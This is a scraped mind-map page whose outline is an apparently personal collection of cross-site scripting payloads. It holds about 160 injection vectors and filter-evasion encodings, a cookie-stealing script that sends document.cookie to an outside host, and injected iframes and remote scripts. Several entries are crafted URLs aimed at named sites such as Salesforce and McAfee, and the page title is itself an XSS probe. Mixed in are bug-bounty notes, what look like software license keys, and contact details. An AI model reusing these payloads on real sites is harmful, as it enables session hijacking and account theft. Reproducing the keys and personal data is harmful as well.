Unlock the full potential of your projects.
Try MeisterTask for free.
¿No tienes una cuenta?
Regístrate Gratis
Navegar
Mapas Destacados
Categorías
Gestión de proyectos
Objetivos de negocio
Recursos humanos
Lluvia de ideas y análisis
Marketing y contenido
Educación y notas
Entretenimento
Vida
Tecnología
Diseño
Resúmenes
Otros
Idiomas
English
Deutsch
Français
Español
Português
Nederlands
Dansk
Русский
日本語
Italiano
简体中文
한국어
Otros
Ver mapa completo
Copiar y editar mapa
Copiar
rt.1011@outlook.com
Otros
'"
'confirm(1)' "confirm(1)"
Seguir
Comienza Ya.
Es Gratis
Regístrate con Google
ó
regístrate
con tu dirección de correo electrónico
Mapas Mentales Similares
Esbozo del Mapa Mental
rt.1011@outlook.com
por
'confirm(1)' "confirm(1)"
1. 32
2. <img src="/" =_=" title="onerror='prompt(1)'">
3. %253cscript%253ealert(/xss-by-shawar/)%253c/script%253e
4. imp :
5. <form><iframe 	  src="javascript:alert(1)" 	;>
6. DOM : --><iframe%0A%0Dsrc%3Dhttp%3A%2F%2Faxmerc28.5gbfree.com%2Findex.html><%2Fiframe>
7. http://shawarkhan.byethost7.com/?input=--%3E%3Ciframe%0A%0Dsrc%3Dhttp%3A%2F%2Faxmerc28.5gbfree.com%2Findex.html%3E%3C%2Fiframe%3E
8. <a href="//%0aalert(/@irsdl/);//">Possible XSS - works in Chrome</a>
9. <!--<img src="--><img src=x onerror=alert(123)//">
10. *���>]]>%>?></object></script></title></textarea></noscript></style></xmp>���-/"/-alert(1)//><img src=1 onerror=alert(1)>���
11. *���>]]>%>?></object></script></title></textarea></noscript></style></xmp>���-/"/-alert(1)//><img src=1 onerror=alert(1)>���
12. callback=<if
13. -%22%3E%3Cscript%3Ealert%28document.cookie%29%3C
14. '"--><script>alert(/Xss2ro07 aKa Side3ffects)</script>
15. <script>location.href="https://testingxssrj.000webhostapp.com/cookiefile.php?cookie=document.cookie<script>"
15.1. '<svg onload="alert('xx')">'
16. <script language="JaVaScript">
17. for dom : javascript:alert%281%29
17.1. javascript:prompt(document.domain);
18. <body onload=alert("XSS")>
19. ');alert('XSS
20. ssltest
21. A3-K7QCDX-F544N9-QYLM3-S4CBC-4DSZP-YH63X
22. http://www.<script>alert(1)</script .com
23. 2) <svg><style>{font-family:'<iframe/onload=confirm(1)>'
24. Account Lockout Hackerone
25. 5) <img/src=`%00` onerror=this.onerror=confirm(1)
26. 7) <img src=`%00`
 onerror=alert(1)

27. 9) <ScRipT 5-0*3+9/3=>prompt(1)</ScRipT giveanswerhere=?
28. 11) <script /*%00*/>/*%00*/alert(1)/*%00*/</script /*%00*/
29. 13) <iframe/src="data:text/html,<svg onload=alert(1)>">
30. 15) <svg><script xlink:href=data:,window.open('https://www.google.com/')></script
31. 17) <meta http-equiv="refresh" content="0;url=javascript:confirm(1)">
32. 19) <form><a href="javascript:\u0061lert(1)">X sssssssssssssssss
33. 21) <img/	  src=`~` onerror=prompt(1)>
34. 23) <a href="data:application/x-x509-user-cert;
base64
,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="	 >X</a
35. 25) <a href=[�]"� onmouseover=prompt(1)//">XYZ</a
36. 27) <style/onload=prompt('XSS')
37. 29) </style  ><script   :-(>/**/alert(document.location)/**/</script   :-(
38. 31) <form><textarea onkeyup='\u0061\u006C\u0065\u0072\u0074(1)'> ss
39. 33) <iframe srcdoc='<body onload=prompt(1)>'>
40. 35) <script ~~~>alert(0%0)</script ~~~> abh
41. 37) <///style///><span %2F onmousemove='alert(1)'>SPAN
42. 39) "><svg><style>{-o-link-source:'<body/onload=confirm(1)>'
43. 41) <marquee onstart='javascript:alert(1)'>^__^
44. 43) <iframe/%00/ src=javaSCRIPT:alert(1)
45. 45) /*iframe/src*/<iframe/src="<iframe/src=@"/onload=prompt(1) /*iframe/src*/>
46. 47) </font>/<svg><style>{src:'<style/onload=this.onload=confirm(1)>'</font>/</style>
47. 49) </plaintext\></|\><plaintext/onmouseover=prompt(1)
48. 51) <a href="javascript:\u0061le%72t(1)"><button> ss
49. 53) <iframe style="xg-p:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)">
50. 55) <embed src="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf">
51. 57) <var onmouseover="prompt(1)">On Mouse Over</var>
52. 59) <img src="/" =_=" title="onerror='prompt(1)'">
53. 61) <script src="data:text/javascript,alert(1)"></script>
54. 63) <iframe/onreadystatechange=alert(1)
55. 65) <input value=<><iframe/src=javascript:confirm(1)
56. 67) http://www.<script>alert(1)</script .com
57. 69) <svg><script ?>alert(1)
58. 71) <img src=`xx:xx`onerror=alert(1)>
59. 73) <meta http-equiv="refresh" content="0;javascript:alert(1)"/>
60. 75) <embed code="http://businessinfo.co.uk/labs/xss/xss.swf" allowscriptaccess=always>
61. 77) <a href="data:text/html;base64_,<svg/onload=\u0061le%72t(1)>">X</a
62. 79) <script>~'\u0061' ; \u0074\u0068\u0072\u006F\u0077 ~ \u0074\u0068\u0069\u0073. \u0061\u006C\u0065\u0072\u0074(~'\u0061')</script U+
63. 81) <script/src=data:text/j\u0061v\u0061script,\u0061%6C%65%72%74(/XSS/)></script
64. 83) <script>+-+-1-+-+alert(1)</script>
65. 85) <script itworksinallbrowsers>/*<script* */alert(1)</script
66. 87) <svg><script>//
confirm(1);</script </svg>
67. 89) ss<a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaa aaaaaaaaaa href=javascript:alert(1)>ClickMe
68. 91) <div/onmouseover='alert(1)'> style="x:">
69. https://www.google.com.pk/webhp?sourceid=chrome-instant&ion=1&espv=2&ie=UTF-8#q=metasploit+tp+link
70. 93) <script/src=data:text/javascript,alert(1)></script>
71. 95) "><img src=x onerror=window.open('https://www.google.com/');>
72. 97) ss<math><a xlink:href="//jsfiddle.net/t846h/">click
73. 99) <iframe src="data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E"></iframe>ss
74. 100) <a href="data:text/html;blabla,<script src="http://sternefamily.net/foo.js"></script>​">Click Me</a>
75. 0300 7014685
76. %3E%3Cimg+src%3Dx+onerror%3Dprompt(1)%3B%3E
77. HTTP Cashe Poisoning issue
78. Detecting Xss with advance fuzzer
79. ]Detecting and Exploiting XSS with Xenotix XSS Exploit
80. Discovering XSS Vulnerabilities with Burp Intruder
81. check it soon
82. https://<your_instance>.my.salesforce.com/setup/ui/replacePickList.jsp?msg=This%20is%20dom%20based%20XSS+%3Cimg%20src=M%20onerror=prompt%281%29;%3E&retURL=%2Fsetup%2Fui%2Fpicklist_masterdetail.jsp%3Ftid%3D03j%26pt%3D45%26retURL%3D%252Fui%252Fsetup%252FSetup%253Fsetupid%253DCase%26setupid%3DCaseContactRoles&tableName=CaseContactRole&id=45&setupid=CaseContactRoles
83. 1) <iframe %00 src="	javascript:prompt(1)	"%00>
84. Build > Activities me Task field done
85. Product Key: D275-7NPG-2YPB-PFBR
86. <marquee onstart='javascript:alert("note")'>^__^
87. <img/	  src=`~` onerror=prompt(1)>
88. http://shawarkhan.byethost7.com/?input=--%3E%3Ciframe%0A%0Dsrc%3Dhttp%3A%2F%2Faxmerc28.5gbfree.com%2Findex.html%3E%3C%2Fiframe%3E
89. <base href="javascript:\">
90. <IMG """><SCRIPT>alert("XSS")</SCRIPT>">s
91. *���>]]>%>?></object></script></title></textarea></noscript></style></xmp>���-/"/-alert(1)//><img src=1 onerror=alert(1)>���
92. *���>]]>%>?></object></script></title></textarea></noscript></style></xmp>���-/"/-alert(1)//><img src=1 onerror=alert(1)>���
93. '"--></style></script><script>alert("XSSed by Cyb3R_Shubh4M")
94. rame src='http://xssed.com'
95. /script%3E-
96. http://go.mcafee.com/activation.cfm?firewall_id=%22%20style=%22background-image:url%28%27http://i.imgur.com/oHp8A.gif%27%29%22%20onfocus=%22document.write%28String.fromCharCode%2860%29%2B%27iframe%20src=http://xssed.com%20height=100%25%20width=100%25%3E%27%2BString.fromCharCode%2860%29%2B%27/iframe%3E%27%2BString.fromCharCode%2860%29%2B%27script%3Ealert%28/XSS%20/%29%27%2BString.fromCharCode%2860%29%2B%27/script%3E%27%29%22%20foo=%22bar
97. '<img src="c" onload="alert(1)">'
98. fixEscape
99. https://www.collective2.com/cgi-perl/verify.mpl?pid=102085904&k=30124476804813
100. %27|alert%28%27XSS%27%29|%27
101. all vulnerabilities videos : https://www.youtube.com/watch?v=d1D7twRO5Ys
102. http://ssl-checker.online-domain-tools.com/
103. javascript:alert(document.domain)
103.1. "><script>alert(1);</script>#"><img src=x onerror=prompt(1);>
104. <var onmouseover="prompt(1)">On Mouse Over</var>
105. 3) <input/onmouseover="javaSCRIPT:confirm(1)"
106. 4) <sVg><scRipt %00>alert(1) {Opera}
107. 6) <form><isindex formaction="javascript:confirm(1)"
108. 8) <script/	 src='https://dl.dropbox.com/u/13018058/js.js' /	></script>
109. 10) <iframe/src="data:text/html;	base64	,PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg==">
110. 12) "><h1/onmouseover='\u0061lert(1)'>%00
111. 14) <meta content="
 1 
; JAVASCRIPT: alert(1)" http-equiv="refresh"/>
112. 16) <svg><script x:href='https://dl.dropbox.com/u/13018058/js.js' {Opera}
113. 18) <iframe src=javascript:alert(document.location)>
114. 20) </script><img/*%00/src="worksinchrome:prompt(1)"/%00*/onerror='eval(src)'>
115. 22) <form><iframe 	  src="javascript:alert(1)" 	;>
116. 24) http://www.google<script .com>alert(document.location)</script
117. 26) <img/src=@  onerror = prompt('1') sss
118. 28) <script ^__^>alert(String.fromCharCode(49))</script ^__^
119. 30) �</form><input type="date" onfocus="alert(1)"> sssssssssssss
120. 32) <script /***/>/***/confirm('\uFF41\uFF4C\uFF45\uFF52\uFF54\u1455\uFF11\u1450')/***/</script /***/
121. 34) <a href="javascript:void(0)" onmouseover=
javascript:alert(1)
>X</a>
122. 36) <style/onload=<!--	> alert (1)>
123. 38) <img/src='http://i.imgur.com/P8mL8.jpg' onmouseover=	prompt(1)
124. 40) <blink/ onmouseover=prompt(1)>OnMouseOver {Firefox & Opera}
125. 42) <div/style="width:expression(confirm(1))">X</div> {IE7}
126. 44) //<form/action=javascript:alert(document.cookie)><input/type='submit'>//
127. 46) //|\\ <script //|\\ src='https://dl.dropbox.com/u/13018058/js.js'> //|\\ </script //|\\
128. 48) <a/href="javascript: javascript:prompt(1)"><input type="X">
129. 50) </svg>''<svg><script 'AQuickBrownFoxJumpsOverTheLazyDog'>alert(1) {Opera}
130. 52) <div onmouseover='alert(1)'>DIV</div>
131. 54) <a href="jAvAsCrIpT:alert(1)">X</a> ssss
132. 56) <object data="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf">
133. 58) <a href=javascript:alert(document.cookie)>Click Here</a> sss
134. 60) <%<!--'%><script>alert(1);</script -->
135. 62) <iframe/src \/\/onload = prompt(1)
136. 64) <svg/onload=alert(1)
137. 66) <input type="text" value=`` <div/onmouseover='alert(1)'>X</div>
138. 68) <iframe src=j
	a
		v
			a
				s
					c
						r
							i
								p
									t
										:a
											l
												e
													r
														t
															28
																1
																	%29></iframe>
139. 70) <iframe src=j	a	v	a	s	c	r	i	p	t	:a	l	e	r	t	%28	1	%29></iframe>
140. 72)
141. 74) ss <math><a xlink:href="//jsfiddle.net/t846h/">click
142. 76) <svg contentScriptType=text/vbs><script>MsgBox+1
143. 78) <iframe/onreadystatechange=\u0061\u006C\u0065\u0072\u0074('\u0061') worksinIE>
144. 80) <script/src="data:text%2Fj\u0061v\u0061script,\u0061lert('\u0061')"></script a=\u0061 & /=%2F
145. 82) <object data=javascript:\u0061le%72t(1)>
146. 84) <body/onload=<!-->
alert(1)>
147. 86) <img src ?itworksonchrome?\/onerror = alert(1)
148. 88) <svg><script onlypossibleinopera:-)> alert(1)
149. 90) <script x> alert(1) </script 1=2
150. 92) <--`<img/src=` onerror=alert(1)> --!>
151. Your License Key: 7SCQ-P3LE-F6RE-DYYC
152. 94) <div style="xg-p:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)" onclick="alert(1)">x</button>ss
153. 96) ss<form><button formaction=javascript:alert(1)>CLICKME
154. 98) ss<object data=data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+></object>
155. ss
156. https://www.linkedin.com/pulse/20140812222156-79939846-xss-vectors-you-may-need-as-a-pen-tester
157. New
158. http://www.smeegesec.com/2012/06/collection-of-cross-site-scripting-xss.html
159. Email Change Request Dosent Expir After Password Change
160. www.youtube.com/watch?v=R8AgEWPFJ1g
161. https://www.exploit-db.com/docs/21223.pd
162. http://bughunting.guide/discovering-xss-vulnerabilities-with-burp-intruder/
163. https://fdhdhdfhdh-dev-ed.my.salesforce.com/ui/support/servicedesk/ServiceDeskHotkeyEditor/e?retURL=%2Fui%2Fsupport%2Fservicedesk%2FServiceDeskHotkeyEditor%2Fd%3Ftsid%3D02u28000000LOiq&tsid=02u28000000LOiq#
Comienza Ya. ¡Es Gratis!
Conéctate con Google
ó
Regístrate